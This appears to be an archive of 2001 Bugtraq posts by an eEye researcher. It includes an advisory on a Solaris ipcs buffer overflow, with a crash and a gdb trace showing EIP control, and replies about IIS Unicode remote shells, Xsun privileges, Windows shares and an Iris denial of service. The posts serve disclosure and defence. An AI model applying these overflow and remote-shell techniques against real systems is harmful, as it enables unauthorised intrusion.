bash-2.03$ /usr/bin/i86/ipcs
IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
Message Queue facility inactive.
Shared Memory:
m 0 0x54d3 --rw-r--r-- root root
Semaphore facility inactive.
Segmentation Fault (core dumped)

Note: [buffer] is any 1036 (or so) character string. A's...

bash-2.03$ su root
# gdb /usr/bin/i86/ipcs core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are

#0 0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141

Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches
for this and other related vulnerabilities eEye has discovered.

chmod –s /usr/bin/i86/ipcs
This will remove the setgid bit from /usr/bin/i86/ipcs, therefore if someone
does exploit this vulnerability, they won’t gain higher privileges.

ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last
but not least…

Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
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the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

Re: Solaris Xsun buffer overflow vulnerability

2001-04-12 Thread Marc Maiffret

Actually that was an error in our advisory.

The correct (yet correct us if we are wrong again ;-]) information is:
Solaris 7 and Solaris 8 x86 Xsun is suid
Solaris 7 and Solaris 8 Sparc Xsun is sgid

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer
"Walk on."

|-Original Message-
|From: Bugtraq List [mailto:[EMAIL PROTECTED]]On Behalf Of Leif
|Sent: Wednesday, April 11, 2001 9:48 AM
|Subject: Re: Solaris Xsun buffer overflow vulnerability
|Don't have a Solaris 7 box to check.  Not sure why your Solaris 8 has
|a SUID Xsun install, either.

Re: Windows Sharing Allows Internet Tracking

2001-03-25 Thread Marc Maiffret

I could be wrong about the following so let me know if you know for a _fact_
that I am.

|-Original Message-
|From: Bugtraq List [mailto:[EMAIL PROTECTED]]On Behalf Of
|Preston W Chang
|Sent: Wednesday, March 21, 2001 3:13 PM
|Subject: Windows Sharing Allows Internet Tracking

|Usually, many intruders will go in with
|obreption and probably without anyone ever knowing without
|some sort of IDS suite or logging system besides that of

|When logging into a share via NetBIOS, on a NT-to-NT
|connection, the user connecting will have his/her Temporary
|Internet Files transferred onto the server which they have
|connected to.

That is incorrect. When you connect to a netbios share, i.e. net use x:
\\ip\terd$ bob /user:bob your temporary internet files are _not_

|You would find it in this type of path:
|c:\winnt\profiles\Administrator\Temporary Internet Files.

No. The only reason you came to this conclusion is because it "looks" like
this is what is happening.

C:\>net use q: \\ip\c$ bob /user:bob

Then if you go an connect to q:\winnt\profiles\administrator\temporary
internet files then yes you will get a listing of your local machines temp
files and not the remote machines BUT those files are not stored on the
remote machine, in fact Windows NT is actually redirecting your temp
internet files request back to your local machine. So while it might look
like the files have been transferred to the remote machine. They have not
been. Load up filemon (

|you believe that you are victim to an intruder, definitelySigned,
|check this folder. I have examined many of the NT "rootkit"
|techniques and suites, with none that include
|cleaning out the transferred cache.

That's because the cache doesn't get transferred. Well at least from what I
have seen, I could be completely wrong.

|   Cheers,
|  Charles Chear [[EMAIL PROTECTED]]

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer

Re: shell on IIS server with Unicode using *only* HTTP

2001-01-26 Thread Marc Maiffret

| -Original Message-
| From: Bugtraq List [mailto:[EMAIL PROTECTED]]On Behalf Of Roelof
| Temmingh
| Sent: Wednesday, January 24, 2001 4:30 PM
| Subject: shell on IIS server with Unicode using *only* HTTP

|  Above procedure will drop you into a shell on the box
|  without crashing the server (*winks at Eeye*).

Actually the reason the server crashed with our exploit (IISHack 1.5, if
that's the one your talking of) was because we were not simply just copying
a file in attempts to remotely get a cmd.exe prompt as IUSR_MACHINE because
that's easy. Our exploit actually took the unicode attack a step further by
exploiting a local buffer overflow within the .asp handler which then lead
to us binding a cmd.exe prompt to a remote server as SYSTEM.

URL to IISHack1.5

|  This procedure is nice for servers that are very tightly
|  firewalled; servers that are not allowed to FTP, RCP or TFTP
|  to the Internet.
| 2. Unicodexecute version3 (
|  same as before plus
|  -includes searches for alternative executable dirs
|  -more robust, stable than before
|  -checks for access denied etc. added
| Regards,
| Roelof.
| --
| Roelof W Temmingh SensePost IT security
| [EMAIL PROTECTED]  +27 83 448 6996

Marc Maiffret
Chief Hacking Officer
eCompany / eEye

Re: eEye Iris the Network traffic analyser DoS

2001-01-23 Thread Marc Maiffret

This indeed is a bug in Iris 1.01 beta and it has been fixed within Iris
2.0. Iris 2.0 should be released within the next two days. All users of Iris
1.01 are being contacted and sent a url to 2.0 once it is released.

The one thing to note is that someone has to actually click and view the
"evil" packet in order for Iris to crash.  If you simply open iris and start
sniffing and receive the "evil" packet, without clicking to view it, then
Iris will not crash.

Thanks much to grazer for contacting us prior to posting to Bugtraq so that
we could work on a fix for this problem.

Marc Maiffret
Chief Hacking Officer
eCompany / eEye

| -Original Message-
| From: Bugtraq List [mailto:[EMAIL PROTECTED]]On Behalf Of grazer
| Sent: Sunday, January 21, 2001 6:27 PM
| Subject: eEye Iris the Network traffic analyser DoS
| Hi there,
| There exists a vulnerability that will cause the iris network
| traffic analyser to hang.
| I have included an exploit, that will demonstrate the bug, the
| exploit will send a packet to the remote host,
| when the remote host opens the packet (to examine it) iris will
| quit, leaving an error message.
| Sincerely yours,
| Wouter ter Maat aka grazer
| digit-labs information security